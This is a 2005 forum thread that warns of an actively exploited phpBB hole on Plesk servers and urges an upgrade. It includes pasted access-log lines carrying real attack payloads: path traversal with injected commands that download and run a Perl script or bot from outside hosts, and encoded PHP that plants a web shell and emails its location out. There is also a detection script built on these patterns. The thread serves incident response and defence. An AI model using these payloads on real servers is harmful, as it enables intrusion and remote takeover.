
Upgrade Phpbb Now!!! 2.0.15


tekmage

Guest
Folks, I've been fighting a battle for the last week or so. Some jack*ss script kiddy has been exploiting a hole in phpBB that ships with Plesk 7.5.3 and below.

I just figured it out last night and I'd like to pass this on ASAP to everyone.

Run, do not walk, to the phpBB.com site and download 2.0.15, then upgrade any and all sites you have using this software.

Here is the exploit attempt from my access logs; you might want to check through yours ASAP.

[root@hydra root]# cat /home/httpd/vhosts/*/statistics/logs/access_log* | grep "%20/tmp"
66.250.130.186 - - [29/May/2005:15:15:50 -0700] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=d86b9a329a43539c22cee9a07ab95fe2&niggaip=1&niggaport=1&nigga=passthru(%22cd%20/tmp;curl%20-C%20-%20http://uhoho.gratishost.com/a.pl%20%3E%20a.pl;perl%20a.pl%22); HTTP/1.1" 200 7926 "http://www.FOOOME.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


216.57.216.163 - - [15/Jan/2005:05:40:59 -0800] "GET /classifiedweapon.htm&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20users.volja.net/kojpic/botek;wget%20users.volja.net/kojpic/botek;chmod%20777%20/tmp/botek;/tmp/botek;rm%20sess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 404 956 "-" "LWP::Simple/5.64"
66.240.141.100 - - [02/May/2005:14:32:01 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=718da6c3e60b36417f1d9fa7ea918328&nigga=$out=\"PGZvcm0gbWV0aG9kPXBvc3Q+CjxpbnB1dCBtYXhMZW5ndGg9NTAwIHNpemU9MTAwIG5hbWU9ZW1haWwgPgo8YnI+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUVudm95ZXI+Cjxicj48L2Zvcm0+Cjx0ZXh0YXJlYSByZWFkb25seSAgY29scz0xMjAgcm93cz0zMD48P1BIUCBzeXN0ZW0oJGVtYWlsKSA/PjwvdGV4dGFyZWE+Cgo=\";$ifp=fopen(\"/tmp/.newminibd.php\",\"wb\");fwrite($ifp,base64_decode($out));fclose($ifp);$cmd=exec(\"find%20../../$pwd%20-perm%20777%20-type%20d\");if($cmd){exec(\"cp%20/tmp/.newminibd.php%20\".$cmd);mail(\"[email protected]\",$_SERVER[SERVER_NAME],\"Site%20:%20\".\"http://\".$_SERVER[SERVER_NAME].substr($cmd,5).\"/.newminibd.php\");} HTTP/1.1" 200 7917 "http://www.FOOO.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


66.240.141.100 - - [02/May/2005:16:56:43 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=ba84ad1a6ff8287142b5f1b0adf0a753&nigga=$out=\"PGZvcm0gbWV0aG9kPXBvc3Q+CjxpbnB1dCBtYXhMZW5ndGg9NTAwIHNpemU9MTAwIG5hbWU9ZW1haWwgPgo8YnI+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUVudm95ZXI+Cjxicj48L2Zvcm0+Cjx0ZXh0YXJlYSByZWFkb25seSAgY29scz0xMjAgcm93cz0zMD48P1BIUCBzeXN0ZW0oJGVtYWlsKSA/PjwvdGV4dGFyZWE+Cgo=\";$ifp=fopen(\"/tmp/.newminibd.php\",\"wb\");fwrite($ifp,base64_decode($out));fclose($ifp);$cmd=exec(\"find%20../../$pwd%20-perm%20777%20-type%20d\");if($cmd){exec(\"mv%20/tmp/.newminibd.php%20\".$cmd);mail(\"[email protected]\",$_SERVER[SERVER_NAME],\"Site%20:%20\".\"http://\".$_SERVER[SERVER_NAME].substr($cmd,5).\"/.newminibd.php\");} HTTP/1.1" 200 7917 "http://www.FOOO.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
[root@hydra root]#
66.240.141.100 - - [02/May/2005:14:32:01 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=718da6c3e60b36417f1d9fa7ea918328&nigga=$out=\"PGZvcm0gbWV0aG9kPXBvc3Q+CjxpbnB1dCBtYXhMZW5ndGg9NTAwIHNpemU9MTAwIG5hbWU9ZW1haWwgPgo8YnI+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUVudm95ZXI+Cjxicj48L2Zvcm0+Cjx0ZXh0YXJlYSByZWFkb25seSAgY29scz0xMjAgcm93cz0zMD48P1BIUCBzeXN0ZW0oJGVtYWlsKSA/PjwvdGV4dGFyZWE+Cgo=\";$ifp=fopen(\"/tmp/.newminibd.php\",\"wb\");fwrite($ifp,base64_decode($out));fclose($ifp);$cmd=exec(\"find%20../../$pwd%20-perm%20777%20-type%20d\");if($cmd){exec(\"cp%20/tmp/.newminibd.php%20\".$cmd);mail(\"[email protected]\",$_SERVER[SERVER_NAME],\"Site%20:%20\".\"http://\".$_SERVER[SERVER_NAME].substr($cmd,5).\"/.newminibd.php\");} HTTP/1.1" 200 7917 "http://www.FOOOME.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


If successful, it installs a Perl script into /tmp that is a UDP flood exploit. The file has a random name, but mostly it's called ret.pl.

I started sweeping any and all Perl scripts from my /tmp every 3 minutes; that didn't work, so I went down to 1 minute.

I tried securing my /tmp by moving it to a new partition mounted noexec, nosuid. That did squat.

Finally I was able to find that above in the access logs and figured out that it was phpBB. I failed at my first attempt to patch it, and got nailed again that night. So I have blown away any and all old copies and started with a fresh 2.0.15 build on all sites using phpBB.

http://www.phpbb.com/downloads.php


Also note the two trigger email addresses above.

[email protected]

and

[email protected]

You might want to blacklist those. I have.

I'm hoping that this works. Let me know if you've had similar issues.

Best,

-=Dave
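Added example, not code from the post above or from phpBB: a small Python scanner that applies the patterns visible in the quoted log lines (admin_styles.php called with mode=addnew and a traversing install_to, a PHP execution function injected into a parameter value, and dropper commands aimed at /tmp) to Apache combined-format access logs. It URL-decodes repeatedly so the double-encoded highlight= payload is not missed, and it tolerates probes that omit the "?" before the query string. The sample log lines inside it are constructed, modeled on the post's entries with hostnames and parameter names replaced; the signatures are my own assumptions, not an official phpBB ruleset.

```python
"""Scan Apache access logs for the phpBB attack patterns quoted in the post.

Added example, not code from the post or from phpBB. Signatures are my own
assumptions derived from the logged requests: admin_styles.php traversal,
PHP execution functions injected into a parameter, and dropper commands
aimed at /tmp.
"""
import re
from urllib.parse import unquote

# Apache combined log format: ip ident user [time] "method url proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) \S+'
)
# PHP functions an injected string needs in order to run a command.
EXEC_RE = re.compile(r'\b(passthru|system|exec|shell_exec|popen|eval)\s*\(', re.I)
# Dropper behaviour seen in the post: fetch something, stage it in /tmp, run it.
DROP_RE = re.compile(r'cd\s+/tmp|\bwget\s|\bcurl\s|chmod\s+777', re.I)

# Constructed sample lines modeled on the post (hosts and parameter names replaced).
SAMPLE_LOG = r'''
66.250.130.186 - - [29/May/2005:15:15:50 -0700] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../tmp&sid=d86b9a329a43539c22cee9a07ab95fe2&cmd=passthru(%22cd%20/tmp;curl%20-C%20-%20http://example.invalid/a.pl%20%3E%20a.pl;perl%20a.pl%22); HTTP/1.1" 200 7926 "http://www.example.invalid/forum/" "Mozilla/4.0"
216.57.216.163 - - [15/Jan/2005:05:40:59 -0800] "GET /classifiedweapon.htm&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20example.invalid/botek;chmod%20777%20/tmp/botek;/tmp/botek&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 404 956 "-" "LWP::Simple/5.64"
10.0.0.5 - - [02/May/2005:14:40:00 -0500] "GET /forum/viewtopic.php?t=42&highlight=plesk HTTP/1.1" 200 15000 "-" "Mozilla/5.0"
10.0.0.6 - - [02/May/2005:14:41:00 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=subSilver&sid=abc HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
'''


def decode(value, rounds=3):
    """URL-decode repeatedly: the highlight= payload is double-encoded (%2527 -> %27 -> ')."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value


def split_params(query):
    """Split the query ourselves so ';' inside a payload is never treated as a separator."""
    params = {}
    for part in query.split("&"):
        key, _, val = part.partition("=")
        params[key.lower()] = decode(val)
    return params


def classify(line):
    """Return a dict describing the hit if the line matches a signature, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw = m.group("url")
    path, sep, query = raw.partition("?")
    if not sep:
        # Some probes drop the '?' (e.g. /page.htm&rush=...); still parse the tail.
        path, _, query = raw.partition("&")
    params = split_params(query)
    verdicts = []
    if (path.lower().endswith("/admin/admin_styles.php")
            and params.get("mode") == "addnew"
            and "../" in params.get("install_to", "")):
        verdicts.append("admin_styles.php traversal")
    if any(EXEC_RE.search(v) for v in params.values()):
        verdicts.append("php code injection")
    if any(DROP_RE.search(v) for v in params.values()):
        verdicts.append("dropper fetch into /tmp")
    if not verdicts:
        return None
    return {"ip": m.group("ip"), "time": m.group("time"),
            "status": int(m.group("status")), "path": path, "verdicts": verdicts}


def scan(log_text):
    """Classify every non-empty line and return the hits in log order."""
    hits = []
    for line in log_text.splitlines():
        hit = classify(line.strip()) if line.strip() else None
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h["time"], h["ip"], h["status"], h["path"], ", ".join(h["verdicts"]))
```

To use it on a Plesk box, read each `/home/httpd/vhosts/*/statistics/logs/access_log*` file and pass its contents to `scan()`. The poster's `grep "%20/tmp"` only catches payloads that happen to contain that literal; decoding first also catches the hex-encoded `passthru(...)` in the older highlight= attack. The HTTP status is kept in each hit because the traversal requests in the post returned 200, so sorting those first gives the likeliest successful compromises.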
 
I don't use any program from the Plesk package, because the originals are newer and I don't need an extra database for every program ....

About phpBB: I have disabled it in the application list for my users, and with the phpBB newsletter I get information about fixes and new versions when they become available, not when someone has manipulated it on my server ....

The .15 version is a few weeks old ....
 